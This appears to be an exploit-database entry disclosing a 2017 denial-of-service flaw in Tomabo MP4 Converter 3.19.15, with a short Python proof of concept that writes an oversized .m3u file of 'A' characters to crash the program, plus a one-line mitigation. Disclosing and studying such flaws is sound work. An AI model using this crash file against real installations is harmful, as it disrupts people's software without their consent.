header-logo
Suggest Exploit
vendor:
MP4 Converter
by:
Andy Bowden
7,5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: MP4 Converter
Affected Version From: 3.19.15
Affected Version To: 3.19.15
Patch Exists: NO
Related CWE: None
CPE: a:tomabo:mp4_converter
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x86
2017

Tomabo MP4 Converter DOS

A specially crafted .m3u file containing a buffer of 550000 'A' characters can be imported into the MP4 Converter, causing a denial of service (DoS) condition.

Mitigation:

Ensure that the application is configured to reject files with excessive length.
Source

Exploit-DB raw data:

#!/usr/bin/python

# Exploit Title: Tomabo MP4 Converter DOS
# Date: 13/08/17
# Exploit Author: Andy Bowden
# Vendor Homepage: http://www.tomabo.com/
# Software Link: http://www.tomabo.com/mp4-converter/index.html
# Version: 3.19.15
# Tested on: Windows 7 x86
# CVE : None

#Generate a .m3u file using the python script and import it into the MP4 Converter.

file = "crash.m3u"

buffer = "A" * 550000

f = open(file, "w")
f.write(buffer)
f.close()

Navigation

Suggest Exploit

Services By CQR